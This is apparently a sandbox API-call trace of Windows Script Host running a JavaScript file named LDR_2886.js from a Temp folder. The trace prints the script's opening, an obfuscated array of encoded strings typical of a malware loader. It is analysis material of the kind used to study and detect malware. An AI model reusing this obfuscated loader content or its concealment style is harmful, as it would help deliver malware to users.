	[0052.340] CoCreateInstance (in: rclsid=0x7fee328cba0*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee328cd80*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24ee60 | out: ppv=0x24ee60*=0x7fefec0a1b0) returned 0x0
	[0052.341] ??2@YAPEAX_K@Z () returned 0x316b30
	[0052.341] ??2@YAPEAX_KHPEBDH@Z () returned 0x315af0
	[0052.341] ??2@YAPEAX_K@Z () returned 0x316bf0
	[0052.341] ??2@YAPEAX_K@Z () returned 0x316c50
	[0052.342] ??2@YAPEAX_K@Z () returned 0x317140
	[0052.342] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x24ee20, nSize=0x27 | out: lpBuffer="") returned 0x0
	[0052.342] GetUserDefaultLCID () returned 0x409
	[0052.342] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
	[0052.342] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x24eec0, cchData=6 | out: lpLCData="1252") returned 5
	[0052.342] IsValidCodePage (CodePage=0x4e4) returned 1
	[0052.342] CoCreateInstance (in: rclsid=0x7fee3285d88*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee3285d98*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x316af0 | out: ppv=0x316af0*=0x3775b0) returned 0x0
	[0052.342] IUnknown:AddRef (This=0x3775b0) returned 0x2
	[0052.342] GetCurrentProcessId () returned 0x41c
	[0052.343] GetCurrentThreadId () returned 0x8c0
	[0052.343] GetTickCount () returned 0x1e197
	[0052.343] ISystemDebugEventFire:BeginSession (This=0x3775b0, guidSourceID=0x7fee3285da8, strSessionName="JScript:00001052:00002240:18123287") returned 0x0
	[0052.343] GetCurrentThreadId () returned 0x8c0
	[0052.343] ??2@YAPEAX_K@Z () returned 0x3171e0
	[0052.343] ??2@YAPEAX_K@Z () returned 0x317230
	[0052.343] malloc (_Size=0x80) returned 0x3172e0
	[0052.343] malloc (_Size=0x108) returned 0x317370
	[0052.343] GetTickCount () returned 0x1e197
	[0052.343] GetCurrentThreadId () returned 0x8c0
	[0052.343] ??2@YAPEAX_K@Z () returned 0x317480
	[0052.343] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\ldr_2886.js"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x110
	[0052.343] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0052.343] CreateFileMappingA (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b68, lpName=0x0) returned 0x114
	[0052.343] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x110000
	[0052.343] GetVersionExA (in: lpVersionInformation=0x24f070*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xfd343301, dwBuildNumber=0x7fe, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24f070*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0052.344] IsTextUnicode (in: lpv=0x110000, iSize=19304, lpiResult=0x24f060 | out: lpiResult=0x24f060) returned 0
	[0052.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x110000, cbMultiByte=19304, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19304
	[0052.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x110000, cbMultiByte=19304, lpWideCharStr=0x37f978, cchWideChar=19304 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0052.344] UnmapViewOfFile (lpBaseAddress=0x110000) returned 1
	[0052.345] CloseHandle (hObject=0x114) returned 1
	[0052.345] CloseHandle (hObject=0x110) returned 1
	[0052.345] GetSystemDirectoryA (in: lpBuffer=0x24f0e8, uSize=0x0 | out: lpBuffer=",õ$") returned 0x14
	[0052.345] ??2@YAPEAX_K@Z () returned 0x3174d0
	[0052.345] GetSystemDirectoryA (in: lpBuffer=0x3174d0, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0052.345] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7fefd710000
	[0052.345] ??3@YAXPEAX@Z () returned 0x15720801
	[0052.345] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferIdentifyLevel") returned 0x7fefd72e470
	[0052.345] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferComputeTokenFromLevel") returned 0x7fefd72f9b0
	[0052.345] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferCloseLevel") returned 0x7fefd72f660
	[0052.345] IdentifyCodeAuthzLevelW () returned 0x1
	[0052.649] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24e260 | out: lpSystemTimeAsFileTime=0x24e260*(dwLowDateTime=0x983a38e0, dwHighDateTime=0x1d543d1)) 
	[0052.649] GetCurrentProcessId () returned 0x41c
	[0052.649] GetCurrentThreadId () returned 0x8c0
	[0052.649] GetTickCount () returned 0x1e2cf
	[0052.649] QueryPerformanceCounter (in: lpPerformanceCount=0x24e268 | out: lpPerformanceCount=0x24e268*=17707547397) returned 1
	[0052.650] malloc (_Size=0x100) returned 0x317b60
	[0052.650] GetVersionExA (in: lpVersionInformation=0x24e040*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe33af810, dwBuildNumber=0x7fe, dwPlatformId=0xe33a0000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x24e040*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0052.650] GetUserDefaultLCID () returned 0x409
	[0052.651] IsFileSupportedName () returned 0x1
	[0052.651] _wcsicmp (_String1=".vbs", _String2=".js") returned 12
	[0052.651] _wcsicmp (_String1=".vbe", _String2=".js") returned 12
	[0052.651] _wcsicmp (_String1=".js", _String2=".js") returned 0
	[0052.655] GetSignedDataMsg () returned 0x0
	[0052.655] GetCurrentProcess () returned 0xffffffffffffffff
	[0052.655] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x114, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x24e8a0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x24e8a0*=0x140) returned 1
	[0052.655] GetFileSize (in: hFile=0x140, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0052.655] ??2@YAPEAX_K@Z () returned 0x31a4f0
	[0052.655] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0052.655] ReadFile (in: hFile=0x140, lpBuffer=0x31a4f0, nNumberOfBytesToRead=0x4b68, lpNumberOfBytesRead=0x24e880, lpOverlapped=0x0 | out: lpBuffer=0x31a4f0*, lpNumberOfBytesRead=0x24e880*=0x4b68, lpOverlapped=0x0) returned 1
	[0052.655] CoInitialize (pvReserved=0x0) returned 0x1
	[0052.655] CoCreateInstance (in: rclsid=0x7fee33af850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x24e7f0 | out: ppv=0x24e7f0*=0x31f4c0) returned 0x0
	[0052.660] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24c9f0 | out: lpSystemTimeAsFileTime=0x24c9f0*(dwLowDateTime=0x983bbf80, dwHighDateTime=0x1d543d1)) 
	[0052.660] GetCurrentProcessId () returned 0x41c
	[0052.660] GetCurrentThreadId () returned 0x8c0
	[0052.660] GetTickCount () returned 0x1e2df
	[0052.660] QueryPerformanceCounter (in: lpPerformanceCount=0x24c9f8 | out: lpPerformanceCount=0x24c9f8*=17708583083) returned 1
	[0052.660] malloc (_Size=0x100) returned 0x317c70
	[0052.660] __dllonexit () returned 0x7fee31a14c0
	[0052.660] __dllonexit () returned 0x7fee31a14e8
	[0052.660] GetVersionExA (in: lpVersionInformation=0x24c7d0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xe31a2dc9, dwBuildNumber=0x7fe, dwPlatformId=0xe31a14e8, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x24c7d0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0052.660] GetProcessWindowStation () returned 0x30
	[0052.660] GetUserObjectInformationA (in: hObj=0x30, nIndex=1, pvInfo=0x24c7b8, nLength=0xc, lpnLengthNeeded=0x24c7b0 | out: pvInfo=0x24c7b8, lpnLengthNeeded=0x24c7b0) returned 1
	[0052.660] ??2@YAPEAX_K@Z () returned 0x31f060
	[0052.660] ??2@YAPEAX_K@Z () returned 0x31f0b0
	[0052.660] ??2@YAPEAX_K@Z () returned 0x31f0e0
	[0052.660] ??2@YAPEAX_K@Z () returned 0x31f120
	[0052.660] ??2@YAPEAX_K@Z () returned 0x31f160
	[0052.660] ??2@YAPEAX_K@Z () returned 0x31f1a0
	[0052.661] ??2@YAPEAX_K@Z () returned 0x31f1e0
	[0052.661] ??2@YAPEAX_K@Z () returned 0x31f220
	[0052.661] ??2@YAPEAX_K@Z () returned 0x31f260
	[0052.661] ??2@YAPEAX_K@Z () returned 0x31f2a0
	[0052.661] ??2@YAPEAX_K@Z () returned 0x31f2e0
	[0052.661] ??3@YAXPEAX@Z () returned 0x15720801
	[0052.661] ??2@YAPEAX_K@Z () returned 0x31f330
	[0052.661] ??2@YAPEAX_K@Z () returned 0x31f370
	[0052.661] DllGetClassObject (in: rclsid=0x37e400*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefebb6cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24d4c0 | out: ppv=0x24d4c0*=0x31f0b0) returned 0x0
	[0052.661] ??2@YAPEAX_K@Z () returned 0x31f0b0
	[0052.661] IClassFactory:CreateInstance (in: This=0x31f0b0, pUnkOuter=0x0, riid=0x24e2a0*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x24d4e0 | out: ppvObject=0x24d4e0*=0x31f4c0) returned 0x0
	[0052.661] ??2@YAPEAX_K@Z () returned 0x31f3b0
	[0052.661] GetSystemInfo (in: lpSystemInfo=0x24d320 | out: lpSystemInfo=0x24d320*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0052.661] VirtualQuery (in: lpAddress=0x24d390, lpBuffer=0x24d350, dwLength=0x30 | out: lpBuffer=0x24d350*(BaseAddress=0x24d000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0052.661] ??2@YAPEAX_K@Z () returned 0x31f3f0
	[0052.661] ??2@YAPEAX_K@Z () returned 0x31f410
	[0052.661] ??2@YAPEAX_K@Z () returned 0x31f470
	[0052.661] ??2@YAPEAX_K@Z () returned 0x31f4a0
	[0052.662] ??2@YAPEAX_K@Z () returned 0x31f550
	[0052.662] IUnknown:AddRef (This=0x31f4c0) returned 0x2
	[0052.662] IUnknown:Release (This=0x31f4c0) returned 0x1
	[0052.662] IUnknown:Release (This=0x31f0b0) returned 0x0
	[0052.662] ??3@YAXPEAX@Z () returned 0x15720801
	[0052.662] IUnknown:QueryInterface (in: This=0x31f4c0, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x24e728 | out: ppvObject=0x24e728*=0x31f4c0) returned 0x0
	[0052.662] IUnknown:Release (This=0x31f4c0) returned 0x1
	[0052.662] _strnicmp (_Str1="<?xml", _Str="var d", _MaxCount=0x5) returned -58
	[0052.662] IsTextUnicode (in: lpv=0x31a4f0, iSize=19304, lpiResult=0x24e778 | out: lpiResult=0x24e778) returned 0
	[0052.662] GetACP () returned 0x4e4
	[0052.662] malloc (_Size=0x97d0) returned 0x44dfd0
	[0052.662] GetACP () returned 0x4e4
	[0052.662] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x31a4f0, cbMultiByte=19304, lpWideCharStr=0x44dfd0, cchWideChar=19432 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw=='